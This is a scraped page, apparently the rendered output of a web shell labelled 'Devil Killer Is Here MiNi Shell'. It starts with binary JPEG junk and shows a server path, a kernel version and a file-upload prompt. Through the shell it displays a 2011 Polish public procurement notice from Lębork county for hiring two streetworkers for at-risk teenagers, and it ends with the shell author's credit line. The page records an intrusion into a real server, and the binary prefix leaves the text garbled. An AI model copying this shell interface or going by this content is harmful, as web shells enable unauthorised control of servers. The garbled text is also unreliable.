JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20110225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20110225/65529-N-2011.html

<p class="kh_header"><b>Lębork: Na zatrudnienie dwóch streetworkerów (2 części)</b><br>
<b>Numer ogłoszenia: 65529 - 2011; data zamieszczenia: 25.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Lęborku , ul. Czołgistów 5, 84-300 Lębork, woj. pomorskie, tel. 059 8632810, faks 059 8632850.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.powiat-lebork.com/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Na zatrudnienie dwóch streetworkerów (2 części).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług streetworkera, zgodnie z częścią 1 i częścią 2, w ramach projektu Przyjaciele dzieci ulicy, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, działanie 7.2. Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, poddziałanie 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym).

Grupę docelową w projekcie stanowią w 100% osoby posiadające miejsce zamieszkania (w rozumieniu Kodeksu Cywilnego) na obszarach zdegradowanych miasta Lębork, wymienionych w Nocie Intencyjnej z dn. 02.10.2009 r.
 
Głównym celem projektu jest aktywizacja społeczna 30 mieszkańców obszarów zdegradowanych Lęborka w wieku 13 - 18 lat zagrożonych wykluczeniem społecznym i zawodowym poprzez rozwój nowych form i metod wsparcia indywidualnego i środowiskowego na rzecz integracji społecznej.

Uczestnicy projektu zostaną zrekrutowani z następujących obszarów zdegradowanych Miasta Lębork: 
1.	Aleja Wolności 	cała ulica
2.	Armii Krajowej	1-23
3.	Basztowa	cała ulica
4.	Batalionów Chłopskich	cała ulica
5.	Bohaterów Westerplatte	cała ulica
6.	Buczka	1, 2, 3A, 3B, 4A, 4B, 5, 6
7.	Derdowskiego	cała ulica
8.	Długosza	cała ulica
9.	Findera	cała ulica
10.	Franciszkańska	cała ulica
11.	Gdańska 	1- 7,  111, 114, 116, 117, 118
12.	Głowackiego 	cała ulica
13.	Grottgera	cała ulica
14.	Kasprzaka	cała ulica
15.	Kazimierza Wielkiego	cała ulica
16.	Kellera 	cała ulica
17.	Konopnickiej	cała ulica
18.	Korczaka	cała ulica
19.	Kossaka 	numery 3, 4, 5, 9a, 10, 10a, 105, 106, 108, 110, 111
20.	Krótka 	cała ulica
21.	Kwiatowa	cała ulica
22.	Łokietka	cała ulica
23.	Malczewskiego	cała ulica
24.	Mostnika 	cała ulica
25.	Młynarska	cała ulica
26.	Orlińskiego 	cała ulica
27.	Orzeszkowej	cała ulica
28.	Paderewskiego	cała ulica
29.	Plac Kopernika	cały plac
30.	Plac Piastowski	cały plac
31.	Plac Pokoju	cały plac
32.	Plac Spółdzielczy	cały plac
33.	Prusa 	cała ulica
34.	Przyzamcze	bez numerów: 6, 7, 8, 8a, 8b, 9, 9a, 9b, 9c, 9d, 12, 13 , 14, 15
35.	Przymurna 	cała ulica
36.	Reja	cała ulica
37.	Rodła	cała ulica
38.	Skarżyńskiego	cała ulica
39.	Skłodowskiej-Curie	cała ulica
40.	Solna	cała ulica
41.	Stryjewskiego	cała ulica
42.	Staromiejska	cała ulica
43.	Waryńskiego 	cała ulica
44.	Wyszyńskiego	cała ulica

5. Czas świadczenia usług streetworkera

Część 1 - od 01.04.2011 do 31.10.2011
Część 2 - od 01.04.2011 do 31.10.2011  

6. Dodatkowe informacje (wymogi i obowiązki Wykonawcy oraz Zamawiającego) wspólne dla zadania 1 i zadania 2:

1.	Udział w rekrutacji uczestników projektu od 01.04.2011 r. - zdiagnozowanie problemu wykluczenia społecznego.
2.	Przygotowanie protokołu z przeprowadzonej rekrutacji.
3.	Nawiązywanie kontaktu z podopiecznymi w ich własnym środowisku (obszary zdegradowane miasta Lęborka).
4.	Mobilizacja podopiecznych (uczestników projektu) do szeroko rozumianej aktywności i uczestnictwa w zajęciach dla nich przewidzianych.
5.	Bieżące informowanie uczestników o planowanych działaniach oraz ewentualnych zmianach, które mogą wystąpić przy realizacji zadań projektowych.
6.	Sprawdzanie każdorazowo obecności swoich podopiecznych na zajęciach przewidzianych dla nich harmonogramem:
- na zajęciach sportowe z zakresu sztuk walki, zajęcia sportowe na sali gimnastycznej;
- warsztaty z doradcą zawodowym;
- zajęcia grupowe w Klubie pracy;
7.	Informowanie Koordynatora Projektu o każdej nieobecności uczestnika projektu (pisemnie lub e-mail lub telefonicznie), najpóźniej 2 dni po stwierdzeniu nieobecności.
8.	Współpraca z trenerami zatrudnionymi w realizacji projektu.
9.	Zorganizowanie, uczestniczenie i przeprowadzenie zajęć dla uczestników na basenie 4 x w miesiącu - Pływalnia Miejska Rafa, ul. Olimpijczyków 31, Lębork.
10.	Zorganizowanie i uczestniczenie z podopiecznymi w seansach filmowych w kinie 3 x w trakcie trwania projektu - Kino Fregata, ul. Gdańska, Lębork.
11.	Uczestniczenie i sprawowanie opieki w trzydniowym (3 pełne doby) spływie kajakowym - termin 
i miejsce zostanie wyznaczone przez Zamawiającego. 
12.	Uczestniczenie i sprawowanie opieki w trzydniowym (3 pełne doby) obozie przetrwania - termin 
i miejsce zostanie wyznaczone przez Zamawiającego.
13.	Uczestniczenie i sprawowanie opieki nad uczestnikami projektu w Dniu Rozrywki w Trójmieście.
14.	Podczas spływu kajakowego, obozu przetrwania, Dnia Rozrywki w Trójmieście oraz turnieju sportowego dla dzieci i młodzieży Wykonawca zobowiązany jest do planowania udziału w poszczególnych działaniach i powierzania określonych zadań do wykonania uczestnikom i uczestniczkom projektu. 
15.	Wykonawca nadzoruje działania i zadania uczestników projektu.
16.	Wykonawca wraz z uczestnikami projektu stworzy regulamin uczestnictwa w spływie kajakowym i obozie oraz  będzie dbał o jego przestrzeganie.
17.	Wykonawca przyjmuje na siebie zapewnienie bezpieczeństwa swoich podopiecznych zgodnie z obowiązującymi przepisami w trakcie realizacji opieki nad nimi.    
18.	Wykonawca nadzoruje udział uczestników i uczestniczek w promocji wolontariatu.
19.	Współorganizacja i udział wraz z uczestnikami projektu w rajdzie rowerowym.  
20.	Współorganizacja i udział wraz z uczestnikami projektu w rajdzie pieszym.
21.	Współorganizacja i udział wraz z uczestnikami projektu w turnieju sportowym dla dzieci i młodzieży 
22.	Współpraca z Punktem Wolontariatu i pracownikiem zatrudnionym do prowadzenie tego Punktu 
23.	Wykonawca zobowiązany jest do odpowiedniego oznaczenia (zgodnie z wytycznymi w zakresie informacji i promocji, które zamieszczone są na stronie internetowej www.efs.gov.pl) wszystkich miejsc i dokumentów bezpośrednio związanych z realizacją usługi, tj. korespondencji dotyczącej Projektu i wszystkich innych dokumentów z nim związanych wychodzących od Wykonawcy poprzez zamieszczanie odpowiednich logotypów oraz informacji o współfinansowaniu. 
24.	Zamawiający zastrzega sobie prawo kontroli sposobu realizacji obowiązków Wykonawcy wynikających z SIWZ oraz umowy.                                       
25.	Zamawiający zapewnia uczestnikom rajdów: rowerowego i pieszego -  drobny poczęstunek (suchy prowiant) i 1 ciepły posiłek oraz uczestnikom turnieju sportowego dla dzieci i młodzieży - catering. 
26.	Wykonawca zobowiązany jest po spływie kajakowym, obozie przetrwania oraz Dniu Rozrywki sporządzić protokół.
27.	Wykonawca zobowiązany jest do udzielania odpowiedzi (ustnie, pisemnie) na pytania Koordynatora Projektu dotyczące postaw, diagnozy zachowań, trafności udzielonego wsparcia i oczekiwań uczestników projektu - informacje są niezbędne do ewaluacji projektu. 
28.	Wykonawca zobowiązany jest do przeprowadzenia ankiet wśród uczestników projektu.
29.	Wykonawca zobowiązany jest do współudziału w opracowywaniu dokumentów sprawozdawczych, analitycznych informacyjnych i innych niezbędnych do realizacji projektu.   
30.	Wykonawcy za wykonanie przedmiotu umowy przysługuje wynagrodzenie ryczałtowe, wypłacane w częściach, po zakończeniu każdego miesiąca.
31.	Wykonawca wraz z rachunkiem/fakturą przedstawi Zamawiającemu comiesięczną prawidłowo wypełnioną kartę czasu pracy.
32.	Zamawiający zastrzega sobie (w związku z finansowaniem ze środków unijnych) oraz instytucjom upoważnionym do przeprowadzenia kontroli prawo wglądu do dokumentów Wykonawcy związanych z realizowaniem zamówienia, w tym dokumentów finansowych. 
33.	Wykonawca zobowiązany jest do przestrzegania przepisów o ochronie danych osobowych, zgodnie z ustawą z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (tekst jednolity: Dz. U. z 2002 r. Nr 101, poz.926, z późn. zm.).

Wymagania niezbędne dotyczące osoby uczestniczącej w wykonaniu zamówienia (dotyczy części I i II): 
1) ukończyła studia wyższe na kierunkach: pedagogicznym, psychologicznym, socjologicznym, resocjalizacyjnym lub pracownik socjalny; 
2) w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, posiada co najmniej półroczne doświadczenie w pracy z osobami wykluczonymi społecznie lub zagrożonymi wykluczeniem społecznym, przeprowadzili co najmniej 1 imprezę (np. rajd, zajęcia dla młodzieży, inne zadania podobnego typu jak przewidziane w projekcie Przyjaciele dzieci ulicy - dokument potwierdzający doświadczenie,
3)  posiada praktyczną umiejętność obsługi komputera w zakresie MS Office,
4)  jest dyspozycyjna, 
5)  posiada umiejętności interpersonalne,
6)  charakteryzuje się stabilnością emocjonalną i odpornością na stres,
7)  posiada znajomość w zakresie działań interwencji kryzysowej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.00.00-5, 85.31.00.00-2, 98.35.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy zostanie spełniony, jeżeli Wykonawca przedstawi:
- Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, wraz z informacja na temat ich wykształcenia, kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia oraz informacją o podstawie dysponowania tymi osobami - zał. nr 4 do SIWZ 
- Oświadczenie, że dysponuje lub będzie  dysponować osobą która będzie  uczestniczyć w wykonywaniu zamówienia, w tym  osoba ta spełnia poniższe wymaganie: - Oświadczenie Wykonawcy - Zał. Nr 5 do SIWZ

Dotyczy części I i II:
Wymagania niezbędne dotyczące osoby uczestniczącej w wykonaniu zamówienia: 
1) ukończyła studia wyższe na kierunkach: pedagogicznym, psychologicznym, socjologicznym, resocjalizacyjnym lub pracownik socjalny; 
2) w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, posiada co najmniej półroczne doświadczenie w pracy z osobami wykluczonymi społecznie lub zagrożonymi wykluczeniem społecznym, przeprowadzili co najmniej 1 imprezę (np. rajd, zajęcia dla młodzieży, inne zadania podobnego typu jak przewidziane w projekcie Przyjaciele dzieci ulicy - dokument potwierdzający doświadczenie,
3)  posiada praktyczną umiejętność obsługi komputera w zakresie MS Office,
4)  jest dyspozycyjna, 
5)  posiada umiejętności interpersonalne,
6)  charakteryzuje się stabilnością emocjonalną i odpornością na stres,
7)  posiada znajomość w zakresie działań interwencji kryzysowej.  

Jeżeli Wykonawca wykazując spełnianie warunków posiadania wiedzy i doświadczenia, potencjału technicznego, osób zdolnych do wykonania zamówienia lub zdolnościach finansowych, polega na zasobach innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków winien udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zdarzeń losowych oraz szczególnych okoliczności, których nie można było przewidzieć  w chwili zawarcia umowy, istnieje możliwość wprowadzenia zmian do zawartej umowy w zakresie:
a)	przesunięcia terminu rozpoczęcia przedmiotu zamówienia,
b)	zmiany osób wskazanych jako streetworker,
c)	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub obowiązki jednej ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.powiat.leborski.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Starostwa Powiatowego w Lęborku, ul. Czołgistów 5, 84-300 Lębork pok. 217.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2011 godzina 10:00, miejsce: Biuro Obsługi Interesanta w Starostwie Powiatowym w Lęborku, ul. Czołgistów 5, 84-300 Lębork.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach projektu pn. Przyjaciele dzieci ulicy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, działanie 7.2. Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, poddziałanie 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zatrudnienie streetworkera dla grupy 20 mężczyzn w wieku od 13 - 18 lat.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zatrudnienie streetworkera dla grupy 20 mężczyzn w wieku od 13 - 18 lat.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.00.00-5, 85.31.00.00-2, 98.35.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zatrudnienie streetworkera dla grupy 10 kobiet w wieku od 13 - 18 lat.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zatrudnienie streetworkera dla grupy 10 kobiet w wieku od 13 - 18 lat.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.00.00-5, 85.31.00.00-2, 98.35.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com